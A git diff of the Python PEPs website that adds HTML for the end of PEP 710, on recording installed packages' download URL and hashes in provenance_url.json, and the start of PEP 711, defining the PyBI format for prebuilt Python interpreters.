Note the current spec for recording installed packages defines a RECORD file that +records installed files, but not the distribution artifact from which these +files were obtained. Auditing installed artifacts can be performed +based on matching the entries listed in the RECORD file. However, this +technique requires a pre-computed database of files each artifact provides or a +comparison with the actual artifact content. Both approaches are relatively +expensive and time consuming operations which could be eliminated with the +proposed provenance_url.json file.

+

Recording provenance information for installed distribution packages, +both those obtained from direct URLs and by name/version from an index, +can simplify auditing Python environments in general, beyond just +the specific use case for containerized applications mentioned earlier. +A community project pip-audit raised their possible interest in +pypa/pip-audit#170.

+
+
+

Specification

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” +in this document are to be interpreted as described in RFC 2119.

+

The provenance_url.json file SHOULD be created in the .dist-info +directory by installers when installing a Distribution Package +specified by name (and optionally by Version Specifier).

+

This file MUST NOT be created when installing a distribution package from a requirement +specifying a direct URL reference (including a VCS URL).

+

Only one of the files provenance_url.json and direct_url.json (from +Recording the Direct URL Origin of installed distributions specification and the corresponding specification of +the Direct URL Data Structure), +may be present in a given .dist-info directory; installers MUST NOT add +both.

+

The provenance_url.json JSON file MUST be a dictionary, compliant with +RFC 8259 and UTF-8 encoded.

+

If present, it MUST contain exactly two keys. The first MUST be url, with +type string. The second key MUST be archive_info with a value defined +below.

+

The value of the url key MUST be the URL from which the distribution +package was downloaded. If a wheel is built from a source distribution, the +url value MUST be the URL from which the source distribution was +downloaded. If a wheel is downloaded and installed directly, the url field +MUST be the URL from which the wheel was downloaded. As in the Direct URL +Data Structure specification, the url +value MUST be stripped of any sensitive authentication information for security +reasons.

+

The user:password section of the URL MAY however be composed of environment +variables, matching the following regular expression:

+
\$\{[A-Za-z0-9-_]+\}(:\$\{[A-Za-z0-9-_]+\})?
+
+
+

Additionally, the user:password section of the URL MAY be a well-known, +non-security sensitive string. A typical example is git in the case of an +URL such as ssh://git@gitlab.com.

+

The value of archive_info MUST be a dictionary with a single key +hashes. The value of hashes is a dictionary mapping hash function +names to a hex-encoded digest of the file referenced by the url value. At +least one hash MUST be recorded. Multiple hashes MAY be included, and it is up +to the consumer to decide what to do with multiple hashes (it may validate all +of them or a subset of them, or nothing at all).

+

Each hash MUST be one of the single argument hashes provided by +hashlib.algorithms_guaranteed, excluding sha1 and md5 which MUST NOT be used. +As of Python 3.11, with shake_128 and shake_256 excluded +for being multi-argument, the allowed set of hashes is:

+
>>> import hashlib
+>>> sorted(hashlib.algorithms_guaranteed - {"shake_128", "shake_256", "sha1", "md5"})
+['blake2b', 'blake2s', 'sha224', 'sha256', 'sha384', 'sha3_224', 'sha3_256', 'sha3_384', 'sha3_512', 'sha512']
+
+
+

Each hash MUST be referenced by the canonical name of the hash, always lower case.

+

Hashes sha1 and md5 MUST NOT be present, due to the security +limitations of these hash algorithms. Conversely, hash sha256 SHOULD +be included.

+

Installers that cache distribution packages from an index SHOULD keep +information related to the cached distribution artifact, so that +the provenance_url.json file can be created even when installing distribution packages +from the installer’s cache.

+
+
+

Backwards Compatibility

+

Following the Recording installed projects specification, +installers may keep additional installer-specific files in the .dist-info +directory. To make sure this PEP does not cause any backwards compatibility +issues, a comprehensive survey of installers and libraries +found no current tools that are using a similarly-named file, +or other major feasibility concerns.

+

The Wheel specification lists files that can be +present in the .dist-info directory. None of these file names collide with +the proposed provenance_url.json file from this PEP.

+
+

Presence of provenance_url.json in installers and libraries

+

A comprehensive survey of the existing installers, libraries, and dependency +managers in the Python ecosystem analyzed the implications of adding support for +provenance_url.json to each tool. +In summary, no major backwards compatibility issues, conflicts or feasibility blockers +were found as of the time of writing of this PEP. More details about the survey +can be found in the Appendix: Survey of installers and libraries section.

+
+
+

Compatibility with direct_url.json

+

This proposal does not make any changes to the direct_url.json file +described in PEP 610 and its corresponding canonical PyPA spec.

+

The content of provenance_url.json file was designed in a way to eventually +allow installers reuse some of the logic supporting direct_url.json when a +direct URL refers to a source archive or a wheel.

+

The main difference between the provenance_url.json and direct_url.json +files are the mandatory keys and their values in the provenance_url.json file. +This helps make sure consumers of the provenance_url.json file can rely +on its content, if the file is present in the .dist-info directory.

+
+
+
+

Security Implications

+

One of the main security features of the provenance_url.json file is the +ability to audit installed artifacts in Python environments. Tools can check +which Python package indexes were used to install Python distribution +packages as well as the hash digests of their release +artifacts.

+

As an example, we can take the recent compromised dependency chain in the +PyTorch incident. +The PyTorch index provided a package named torchtriton. An attacker +published torchtriton on PyPI, which ran a malicious binary. By checking +the URL of the installed Python distribution stated in the +provenance_url.json file, tools can automatically check the source of the +installed Python distribution. In case of the PyTorch incident, the URL of +torchtriton should point to the PyTorch index, not PyPI. Tools can help +identifying such malicious Python distributions installed by checking the +installed Python distribution URL. A more exact check can include also the hash +of the installed Python distribution stated in the provenance_url.json +file. Such checks on hashes can be helpful for mirrored Python package indexes +where Python distributions are not distinguishable by their source URLs, making +sure only desired Python package distributions are installed.

+

A malicious actor can intentionally adjust the content of +provenance_url.json to possibly hide provenance information of the +installed Python distribution. A security check which would uncover such +malicious activity is beyond scope of this PEP as it would require monitoring +actions on the filesystem and eventually reviewing user or file permissions.

+
+
+

How to Teach This

+

The provenance_url.json metadata file is intended for tools and is not +directly visible to end users.

+
+
+

Examples

+
+

Examples of a valid provenance_url.json

+

A valid provenance_url.json list multiple hashes:

+
{
+  "archive_info": {
+    "hashes": {
+      "blake2s": "fffeaf3d0bd71dc960ca2113af890a2f2198f2466f8cd58ce4b77c1fc54601ff",
+      "sha256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f",
+      "sha3_256": "c856930e0f707266d30e5b48c667a843d45e79bb30473c464e92dfa158285eab",
+      "sha512": "6bad5536c30a0b2d5905318a1592948929fbac9baf3bcf2e7faeaf90f445f82bc2b656d0a89070d8a6a9395761f4793c83187bd640c64b2656a112b5be41f73d"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

A valid provenance_url.json listing a single hash entry:

+
{
+  "archive_info": {
+    "hashes": {
+      "sha256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

A valid provenance_url.json listing a source distribution which was used to +build and install a wheel:

+
{
+  "archive_info": {
+    "hashes": {
+      "sha256": "8bfe29f17c10e2f2e619de8033a07a224058d96b3bfe2ed61777596f7ffd7fa9"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/1d/43/ad8ae671de795ec2eafd86515ef9842ab68455009d864c058d0c3dcf680d/micropipenv-0.0.1.tar.gz"
+}
+
+
+
+
+

Examples of an invalid provenance_url.json

+

The following example includes a hash key in the archive_info +dictionary as originally designed in the data structure documented in +Recording the Direct URL Origin of installed distributions. The hash key MUST NOT be present to prevent +from any possible confusion with hashes and additional checks that would be +required to keep hash values in sync.

+
{
+  "archive_info": {
+    "hash": "sha256=236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f",
+    "hashes": {
+      "sha256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

Another example demonstrates an invalid hash name. The referenced hash name does not +correspond to the canonical hash names described in this PEP and +in the Python docs under hashlib.hash.name.

+
{
+  "archive_info": {
+    "hashes": {
+      "SHA-256": "236bcb61156d76c4b8a05821b988c7b8c35bf0da28a4b614e8d6ab5212c25c6f"
+    }
+  },
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+

The last example demonstrates a provenance_url.json file with no hashes +available for the downloaded artifact:

+
{
+  "archive_info": {
+    "hashes": {}
+   }
+  "url": "https://files.pythonhosted.org/packages/07/51/2c0959c5adf988c44d9e1e0d940f5b074516ecc87e96b1af25f59de9ba38/pip-23.0.1-py3-none-any.whl"
+}
+
+
+
+
+

Example pip commands and their effect on provenance_url.json and direct_url.json

+

These commands generate a direct_url.json file but do not generate a +provenance_url.json file. These examples follow examples from Direct +URL Data Structure specification:

+
    +
  • pip install https://example.com/app-1.0.tgz
  • +
  • pip install https://example.com/app-1.0.whl
  • +
  • pip install "git+https://example.com/repo/app.git#egg=app&subdirectory=setup"
  • +
  • pip install ./app
  • +
  • pip install file:///home/user/app
  • +
  • pip install --editable "git+https://example.com/repo/app.git#egg=app&subdirectory=setup" (in which case, url will be the local directory where the git repository has been cloned to, and dir_info will be present with "editable": true and no vcs_info will be set)
  • +
  • pip install -e ./app
  • +
+

Commands that generate a provenance_url.json file but do not generate +a direct_url.json file:

+
    +
  • pip install app
  • +
  • pip install app~=2.2.0
  • +
  • pip install app --no-index --find-links "https://example.com/"
  • +
+

This behaviour can be tested using changes to pip implemented in the PR +pypa/pip#11865.

+
+
+
+

Reference Implementation

+

A proof-of-concept for creating the provenance_url.json metadata file when +installing a Python Distribution Package is available in the PR to pip +pypa/pip#11865. It reuses the already available implementation for the +direct URL data structure to +provide the provenance_url.json metadata file for cases when +direct_url.json is not created.

+

A reference implementation for supporting the provenance_url.json file +in PDM exists is available in pdm-project/pdm#3013.

+

A prototype called pip-preserve was developed to +demonstrate creation of requirements.txt files considering direct_url.json +and provenance_url.json metadata files. This tool mimics the pip +freeze functionality, but the listing of installed packages also includes +the hashes of the Python distribution artifacts.

+

To further support this proposal, pip-sbom demonstrates creation +of SBOM in the SPDX format. The tool uses information stored in the provenance_url.json +file.

+
+
+

Rejected Ideas

+
+

Naming the file direct_url.json instead of provenance_url.json

+

To preserve backwards compatibility with the Recording the Direct URL Origin of installed distributions, the file cannot be named +direct_url.json, as per the text of that specification:

+
+
This file MUST NOT be created when installing a distribution from an other +type of requirement (i.e. name plus version specifier).
+

Such a change might introduce backwards compatibility issues for consumers of +direct_url.json who rely on its presence only when distributions are +installed using a direct URL reference.

+
+
+

Deprecating direct_url.json and using only provenance_url.json

+

File direct_url.json is already well established by the Direct URL +Data Structure specification and is +already used by installers. For example, pip uses direct_url.json to +report a direct URL reference on pip freeze. Deprecating +direct_url.json would require additional changes to the pip freeze +implementation in pip (see PR fridex/pip#2) and could introduce backwards +compatibility issues for already existing direct_url.json consumers.

+
+
+

Keeping the hash key in the archive_info dictionary

+

Direct URL Data Structure +specification discusses the possibility to include the hash key alongside +the hashes key in the archive_info dictionary. This PEP explicitly does +not include the hash key in the provenance_url.json file and allows +only the hashes key to be present. By doing so we eliminate possible +redundancy in the file, possible confusion, and any additional checks that +would need to be done to make sure the hashes are in sync.

+
+
+

Allowing no hashes stated

+

For cases when a wheel file is installed from pip’s cache and built using an +older version of pip, pip does not record hashes of the downloaded source +distributions. As we do not have hashes of these downloaded source +distributions, the hashes key in the provenance_url.json file would not +contain any entries. In such cases, pip does not create any +provenance_url.json file as the provenance information is not complete. It +is encouraged for consumers to rebuild wheels with a newer version of pip in +these cases.

+
+
+

Making the hashes key optional

+

PEP 610 and its corresponding canonical PyPA spec +recommend including the hashes key of the archive_info in the +direct_url.json file but it is not required (per the RFC 2119 language):

+
+
A hashes key SHOULD be present as a dictionary mapping a hash name to a hex +encoded digest of the file.
+

This PEP requires the hashes key be included in archive_info +in the provenance_url.json file if that file is created; per this PEP:

+
+
The value of archive_info MUST be a dictionary with a single key +hashes.
+

By doing so, consumers of provenance_url.json can check +artifact digests when the provenance_url.json file is created by installers.

+
+
+

Storing index URL

+

A possibility was raised for storing the index URL as part of the file content. +This index URL would represent the index configured in pip’s configuration or +specified using the --index-url or --extra-index-url options. Storing +this information was considered confusing, especially when using other +installation options like --find-links. Since the actual index URL is not +strictly bound to the location from which the wheel file was downloaded, we +decided not to store the index URL in the provenance_url.json file.

+
+
+
+

Open Issues

+
+

Availability of the provenance_url.json file in Conda

+

We would like to get feedback on the provenance_url.json file from the Conda +maintainers. It is not clear whether Conda would like to adopt the +provenance_url.json file. Conda already stores provenance related +information (similar to the provenance information proposed in this PEP) in +JSON files located in the conda-meta directory following its actions +during installation.

+
+
+

Using provenance_url.json in downstream installers

+

The proposed provenance_url.json file was meant to be adopted primarily by +Python installers. Other installers, such as APT or DNF, might record the +provenance of the installed downstream Python distributions in their own +way specific to downstream package management. The proposed file is +not expected to be created by these downstream package installers and thus they +were intentionally left out of this PEP. However, any input by developers or +maintainers of these installers is valuable to possibly enrich the +provenance_url.json file with information that would help in some way.

+
+
+
+

Appendix: Survey of installers and libraries

+
+

pip

+

The function from pip’s internal API responsible for installing wheels, named +_install_wheel, +does not store any provenance_url.json file in the .dist-info +directory. Additionally, a prototype introducing the mentioned file to pip in +pypa/pip#11865 demonstrates incorporating logic for handling the +provenance_url.json file in pip’s source code.

+

As pip is used by some of the tools mentioned below to install Python package +distributions, findings for pip apply to these tools, as well as pip does not +allow parametrizing creation of files in the .dist-info directory in its +internal API. Most of the tools mentioned below that use pip invoke pip as a +subprocess which has no effect on the eventual presence of the +provenance_url.json file in the .dist-info directory.

+
+
+

distlib

+

distlib implements low-level functionality to manipulate the +dist-info directory. The database of installed distributions does not use +any file named provenance_url.json, based on the distlib’s source code.

+
+
+

Pipenv

+

Pipenv uses pip to install Python package distributions. +There wasn’t any additional identified logic that would cause backwards +compatibility issues when introducing the provenance_url.json file in the +.dist-info directory.

+
+
+

installer

+

installer does not create a provenance_url.json file explicitly. +Nevertheless, as per the Recording Installed Projects +specification, installer allows passing the additional_metadata argument to +create a file in the .dist-info directory - see the source code. +To avoid any backwards compatibility issues, any library or tool using +installer must not request creating the provenance_url.json file using the +mentioned additional_metadata argument.

+
+
+

Poetry

+

The installation logic in Poetry depends on the +installer.modern-installer configuration option (see docs).

+

For cases when the installer.modern-installer configuration option is set +to false, Poetry uses pip for installing Python package distributions.

+

On the other hand, when installer.modern-installer configuration option is +set to true, Poetry uses installer to install Python package distributions. +As can be seen from the linked sources, there isn’t passed any additional +metadata file named provenance_url.json that would cause compatibility +issues with this PEP.

+
+
+

Conda

+

Conda does not create any provenance_url.json file +when Python package distributions are installed.

+
+
+

Hatch

+

Hatch uses pip to install project dependencies.

+
+
+

micropipenv

+

As micropipenv is a wrapper on top of pip, it uses +pip to install Python distributions, for both lock files +as well as for requirements files.

+
+
+

Thamos

+

Thamos uses micropipenv to install Python package +distributions, +hence any findings for micropipenv apply for Thamos.

+
+
+

PDM

+

PDM uses installer to install binary distributions. +The only additional metadata file it eventually creates in the .dist-info +directory is the REFER_TO file.

+
+
+

uv

+

uv is written in Rust and uses its own installation logic when installing +wheels. +It does not create any additional files +in the .dist-info directory that would collide with the +provenance_url.json file naming.

+
+
+
+

Acknowledgements

+

Thanks to Dustin Ingram, Brett Cannon, and Paul Moore for the initial discussion in +which this idea originated.

+

Thanks to Donald Stufft, Ofek Lev, and Trishank Kuppusamy for early feedback +and support to work on this PEP.

+

Thanks to Gregory P. Smith, Stéphane Bidoul, and C.A.M. Gerlach for +reviewing this PEP and providing valuable suggestions.

+

Thanks to Seth Michael Larson for providing valuable suggestions and for +the proposed pip-sbom prototype.

+

Thanks to Stéphane Bidoul and Chris Jerdonek for PEP 610, and related +Recording the Direct URL Origin of installed distributions and Direct URL Data Structure specifications.

+

Thanks to Frost Ming for raising possible concern around storing index URL in +the provenance_url.json file and initial PEP 710 support in PDM.

+

Last, but not least, thanks to Donald Stufft for sponsoring this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0710.rst

+

Last modified: 2024-08-03 11:39:19 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0711/index.html b/pep-0711/index.html new file mode 100644 index 00000000000..fb4a0af3837 --- /dev/null +++ b/pep-0711/index.html @@ -0,0 +1,671 @@ + + + + + + + + PEP 711 – PyBI: a standard format for distributing Python Binaries | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 711 – PyBI: a standard format for distributing Python Binaries

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>
+
PEP-Delegate:
+
TODO
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
06-Apr-2023
+
Post-History:
+
06-Apr-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

“Like wheels, but instead of a pre-built python package, it’s a +pre-built python interpreter”

+
+
+

Motivation

+

End goal: Pypi.org has pre-built packages for all Python versions on all +popular platforms, so automated tools can easily grab any of them and +set it up. It becomes quick and easy to try Python prereleases, pin +Python versions in CI, make a temporary environment to reproduce a bug +report that only happens on a specific Python point release, etc.

+

First step (this PEP): define a standard packaging file format to hold pre-built +Python interpreters, that reuses existing Python packaging standards as much as +possible.

+
+
+

Examples

+

Example pybi builds are available at pybi.vorpus.org. They’re zip files, so you can unpack them and poke +around inside if you want to get a feel for how they’re laid out.

+

You can also look at the tooling I used to create them.

+
+
+

Specification

+
+

Filename

+

Filename: {distribution}-{version}[-{build tag}]-{platform tag}.pybi

+

This matches the wheel file format defined in PEP 427, except dropping the +{python tag} and {abi tag} and changing the extension from .whl → +.pybi.

+

For example:

+
    +
  • cpython-3.9.3-manylinux_2014.pybi
  • +
  • cpython-3.10b2-win_amd64.pybi
  • +
+

Just like for wheels, if a pybi supports multiple platforms, you can +separate them by dots to make a “compressed tag set”:

+
    +
  • cpython-3.9.5-macosx_11_0_x86_64.macosx_11_0_arm64.pybi
  • +
+

(Though in practice this probably won’t be used much, e.g. the above +filename is more idiomatically written as +cpython-3.9.5-macosx_11_0_universal2.pybi.)

+
+
+

File contents

+

A .pybi file is a zip file, that can be unpacked directly into an +arbitrary location and then used as a self-contained Python environment. +There’s no .data directory or install scheme keys, because the +Python environment knows which install scheme it’s using, so it can just +put things in the right places to start with.

+

The “arbitrary location” part is important: the pybi can’t contain any +hardcoded absolute paths. In particular, any preinstalled scripts MUST +NOT embed absolute paths in their shebang lines.

+

Similar to wheels’ <package>-<version>.dist-info directory, the pybi archive +must contain a top-level directory named pybi-info/. (Rationale: calling it +pybi-info instead dist-info makes sure that tools don’t get confused +about which kind of metadata they’re looking at; leaving off the +{name}-{version} part is fine because only one pybi can be installed into a +given directory.) The pybi-info/ directory contains at least the following +files:

+
    +
  • .../PYBI: metadata about the archive itself, in the same +RFC822-ish format as METADATA and WHEEL files:
    Pybi-Version: 1.0
    +Generator: {name} {version}
    +Tag: {platform tag}
    +Tag: {another platform tag}
    +Tag: {...and so on...}
    +Build: 1   # optional
    +
    +
    +
  • +
  • .../RECORD: same as in wheels, except see the note about +symlinks, below.
  • +
  • .../METADATA: In the same format as described in the current core +metadata spec, except that the following keys are forbidden because +they don’t make sense:
      +
    • Requires-Dist
    • +
    • Provides-Extra
    • +
    • Requires-Python
    • +
    +

    And also there are some new, required keys described below.

    +
  • +
+
+

Pybi-specific core metadata

+

Here’s an example of the new METADATA fields, before we give the full details:

+
Pybi-Environment-Marker-Variables: {"implementation_name": "cpython", "implementation_version": "3.10.8", "os_name": "posix", "platform_machine": "x86_64", "platform_system": "Linux", "python_full_version": "3.10.8", "platform_python_implementation": "CPython", "python_version": "3.10", "sys_platform": "linux"}
+Pybi-Paths: {"stdlib": "lib/python3.10", "platstdlib": "lib/python3.10", "purelib": "lib/python3.10/site-packages", "platlib": "lib/python3.10/site-packages", "include": "include/python3.10", "platinclude": "include/python3.10", "scripts": "bin", "data": "."}
+Pybi-Wheel-Tag: cp310-cp310-PLATFORM
+Pybi-Wheel-Tag: cp310-abi3-PLATFORM
+Pybi-Wheel-Tag: cp310-none-PLATFORM
+Pybi-Wheel-Tag: cp39-abi3-PLATFORM
+Pybi-Wheel-Tag: cp38-abi3-PLATFORM
+Pybi-Wheel-Tag: cp37-abi3-PLATFORM
+Pybi-Wheel-Tag: cp36-abi3-PLATFORM
+Pybi-Wheel-Tag: cp35-abi3-PLATFORM
+Pybi-Wheel-Tag: cp34-abi3-PLATFORM
+Pybi-Wheel-Tag: cp33-abi3-PLATFORM
+Pybi-Wheel-Tag: cp32-abi3-PLATFORM
+Pybi-Wheel-Tag: py310-none-PLATFORM
+Pybi-Wheel-Tag: py3-none-PLATFORM
+Pybi-Wheel-Tag: py39-none-PLATFORM
+Pybi-Wheel-Tag: py38-none-PLATFORM
+Pybi-Wheel-Tag: py37-none-PLATFORM
+Pybi-Wheel-Tag: py36-none-PLATFORM
+Pybi-Wheel-Tag: py35-none-PLATFORM
+Pybi-Wheel-Tag: py34-none-PLATFORM
+Pybi-Wheel-Tag: py33-none-PLATFORM
+Pybi-Wheel-Tag: py32-none-PLATFORM
+Pybi-Wheel-Tag: py31-none-PLATFORM
+Pybi-Wheel-Tag: py30-none-PLATFORM
+Pybi-Wheel-Tag: py310-none-any
+Pybi-Wheel-Tag: py3-none-any
+Pybi-Wheel-Tag: py39-none-any
+Pybi-Wheel-Tag: py38-none-any
+Pybi-Wheel-Tag: py37-none-any
+Pybi-Wheel-Tag: py36-none-any
+Pybi-Wheel-Tag: py35-none-any
+Pybi-Wheel-Tag: py34-none-any
+Pybi-Wheel-Tag: py33-none-any
+Pybi-Wheel-Tag: py32-none-any
+Pybi-Wheel-Tag: py31-none-any
+Pybi-Wheel-Tag: py30-none-any
+
+
+

Specification:

+
    +
  • Pybi-Environment-Marker-Variables: The value of all PEP 508 +environment marker variables that are static across installs of this +Pybi, as a JSON dict. So for example:
      +
    • python_version will always be present, because a Python 3.10 package +always has python_version == "3.10".
    • +
    • platform_version will generally not be present, because it gives +detailed information about the OS where Python is running, for example:
      #60-Ubuntu SMP Thu May 6 07:46:32 UTC 2021
      +
      +
      +

      platform_release has similar issues.

      +
    • +
    • platform_machine will usually be present, except for macOS universal2 +pybis: these can potentially be run in either x86-64 or arm64 mode, and we +don’t know which until the interpreter is actually invoked, so we can’t +record it in static metadata.
    • +
    +

    Rationale: In many cases, this should allow a resolver running on Linux +to compute package pins for a Python environment on Windows, or vice-versa, +so long as the resolver has access to the target platform’s .pybi file. (Note +that Requires-Python constraints can be checked by using the +python_full_version value.) While we have to leave out a few keys +sometimes, they’re either fairly useless (platform_version, +platform_release) or can be reconstructed by the resolver +(platform_machine).

    +

    The markers are also just generally useful information to have +accessible. For example, if you have a pypy3-7.3.2 pybi, and you +want to know what version of the Python language that supports, then +that’s recorded in the python_version marker.

    +

    (Note: we may want to deprecate/remove platform_version and +platform_release? They’re problematic and I can’t figure out any cases +where they’re useful. But that’s out of scope of this particular PEP.)

    +
  • +
  • Pybi-Paths: The install paths needed to install wheels (same keys +as sysconfig.get_paths()), as relative paths starting at the root +of the zip file, as a JSON dict.

    These paths MUST be written in Unix format, using forward slashes as +a separator, not backslashes.

    +

    It must be possible to invoke the Python interpreter by running +{paths["scripts"]}/python. If there are alternative interpreter +entry points (e.g. pythonw for Windows GUI apps), then they +should also be in that directory under their conventional names, with +no version number attached. (You can also have a python3.11 +symlink if you want; there’s no rule against that. It’s just that +python has to exist and work.)

    +

    Rationale: Pybi-Paths and Pybi-Wheel-Tags (see below) are +together enough to let an installer choose wheels and install them into an +unpacked pybi environment, without invoking Python. Besides, we need to write +down the interpreter location somewhere, so it’s two birds with one stone.

    +
  • +
  • Pybi-Wheel-Tag: The wheel tags supported by this interpreter, in +preference order (most-preferred first, least-preferred last), except +that the special platform tag PLATFORM should replace any +platform tags that depend on the final installation system.

    Discussion: It would be nice™ if installers could compute a pybi’s +corresponding wheel tags ahead of time, so that they could install +wheels into the unpacked pybi without needing to actually invoke the +python interpreter to query its tags – both for efficiency and to +allow for more exotic use cases like setting up a Windows environment +from a Linux host.

    +

    But unfortunately, it’s impossible to compute the full set of +platform tags supported by a Python installation ahead of time, +because they can depend on the final system:

    +
      +
    • A pybi tagged manylinux_2_12_x86_64 can always use wheels +tagged as manylinux_2_12_x86_64. It also might be able to +use wheels tagged manylinux_2_17_x86_64, but only if the final +installation system has glibc 2.17+.
    • +
    • A pybi tagged macosx_11_0_universal2 (= x86-64 + arm64 support +in the same binary) might be able to use wheels tagged as +macosx_11_0_arm64, but only if it’s installed on an “Apple +Silicon” machine and running in arm64 mode.
    • +
    +

    In these two cases, an installation tool can still work out the +appropriate set of wheel tags by computing the local platform tags, +taking the wheel tag templates from Pybi-Wheel-Tag, and swapping +in the actual supported platforms in place of the magic PLATFORM +string.

    +

    However, there are other cases that are even more complicated:

    +
      +
    • +
      You can (usually) run both 32- and 64-bit apps on 64-bit Windows. So a pybi
      installer might compute the set of allowable pybi tags on the current +platform as [win32, win_amd64]. But you can’t then just take that +set and swap it into the pybi’s wheel tag template or you get nonsense:
      [
      +  "cp39-cp39-win32",
      +  "cp39-cp39-win_amd64",
      +  "cp39-abi3-win32",
      +  "cp39-abi3-win_amd64",
      +  ...
      +]
      +
      +
      +

      To handle this, the installer needs to somehow understand that a +manylinux_2_12_x86_64 pybi can use a manylinux_2_17_x86_64 wheel +as long as those are both valid tags on the current machine, but a +win32 pybi can’t use a win_amd64 wheel, even if those are both +valid tags on the current machine.

      +
      +
      +
    • +
    • A pybi tagged macosx_11_0_universal2 might be able to use +wheels tagged as macosx_11_0_x86_64, but only if it’s +installed on an x86-64 machine or it’s installed on an ARM +machine and the interpreter is invoked with the magic +incantation that tells macOS to run a binary in x86-64 mode. So +how the installer plans to invoke the pybi matters too!
    • +
    +

    So actually using Pybi-Wheel-Tag values is less trivial than it +might seem, and they’re probably only useful with fairly +sophisticated tooling. But, smart pybi installers will already have +to understand a lot of these platform compatibility issues in order +to select a working pybi, and for the cross-platform +pinning/environment building case, users can potentially provide +whatever information is needed to disambiguate exactly what platform +they’re targeting. So, it’s still useful enough to include in the PyBI +metadata – tools that don’t find it useful can simply ignore it.

    +
  • +
+

You can probably generate these metadata values by running this script on the +built interpreter:

+
import packaging.markers
+import packaging.tags
+import sysconfig
+import os.path
+import json
+import sys
+
+marker_vars = packaging.markers.default_environment()
+# Delete any keys that depend on the final installation
+del marker_vars["platform_release"]
+del marker_vars["platform_version"]
+# Darwin binaries are often multi-arch, so play it safe and
+# delete the architecture marker. (Better would be to only
+# do this if the pybi actually is multi-arch.)
+if marker_vars["sys_platform"] == "darwin":
+    del marker_vars["platform_machine"]
+
+# Copied and tweaked version of packaging.tags.sys_tags
+tags = []
+interp_name = packaging.tags.interpreter_name()
+if interp_name == "cp":
+    tags += list(packaging.tags.cpython_tags(platforms=["xyzzy"]))
+else:
+    tags += list(packaging.tags.generic_tags(platforms=["xyzzy"]))
+
+tags += list(packaging.tags.compatible_tags(platforms=["xyzzy"]))
+
+# Gross hack: packaging.tags normalizes platforms by lowercasing them,
+# so we generate the tags with a unique string and then replace it
+# with our special uppercase placeholder.
+str_tags = [str(t).replace("xyzzy", "PLATFORM") for t in tags]
+
+(base_path,) = sysconfig.get_config_vars("installed_base")
+# For some reason, macOS framework builds report their
+# installed_base as a directory deep inside the framework.
+while "Python.framework" in base_path:
+    base_path = os.path.dirname(base_path)
+paths = {key: os.path.relpath(path, base_path).replace("\\", "/") for (key, path) in sysconfig.get_paths().items()}
+
+json.dump({"marker_vars": marker_vars, "tags": str_tags, "paths": paths}, sys.stdout)
+
+
+

This emits a JSON dict on stdout with separate entries for each set of +pybi-specific tags.

+
+
+ +
+
+

Non-normative comments

+
+

Why not just use conda?

+

This isn’t really in the scope of this PEP, but since conda is a popular way to +distribute binary Python interpreters, it’s a natural question.

+

The simple answer is: conda is great! But, there are lots of python users who +aren’t conda users, and they deserve nice things too. This PEP just gives them +another option.

+

The deeper answer is: the maintainers who upload packages to PyPI are the +backbone of the Python ecosystem. They’re the first audience for Python +packaging tools. And one thing they want is to upload a package once, and have +it be accessible across all the different ways Python is deployed: in Debian and +Fedora and Homebrew and FreeBSD, in Conda environments, in big companies’ +monorepos, in Nix, in Blender plugins, in RenPy games, ….. you get the idea.

+

All of these environments have their own tooling and strategies for managing +packages and dependencies. So what’s special about PyPI and wheels is that +they’re designed to describe dependencies in a standard, abstract way, that +all these downstream systems can consume and convert into their local +conventions. That’s why package maintainers use Python-specific metadata and +upload to PyPI: because it lets them address all of those systems +simultaneously. Every time you build a Python package for conda, there’s an +intermediate wheel that’s generated, because wheels are the common language that +Python package build systems and conda can use to talk to each other.

+

But then, if you’re a maintainer releasing an sdist+wheels, then you naturally +want to test what you’re releasing, which may depend on arbitrary PyPI packages +and versions. So you need tools that build Python environments directly from +PyPI, and conda is fundamentally not designed to do that. So conda and pip are +both necessary for different cases, and this proposal happens to be targeting +the pip side of that equation.

+
+
+

Sdists (or not)

+

It might be cool to have an “sdist” equivalent for pybis, i.e., some +kind of format for a Python source release that’s structured-enough to +let tools automatically fetch and build it into a pybi, for platforms +where prebuilt pybis aren’t available. But, this isn’t necessary for the +MVP and opens a can of worms, so let’s worry about it later.

+
+
+

What packages should be bundled inside a pybi?

+

Pybi builders have the power to pick and choose what exactly goes inside. For +example, you could include some preinstalled packages in the pybi’s +site-packages directory, or prune out bits of the stdlib that you don’t +want. We can’t stop you! Though if you do preinstall packages, then it’s +strongly recommended to also include the correct metadata (.dist-info etc.), +so that it’s possible for Pip or other tools to understand out what’s going on.

+

For my prototype “general purpose” pybi’s, what I chose is:

+
    +
  • Make sure site-packages is empty.

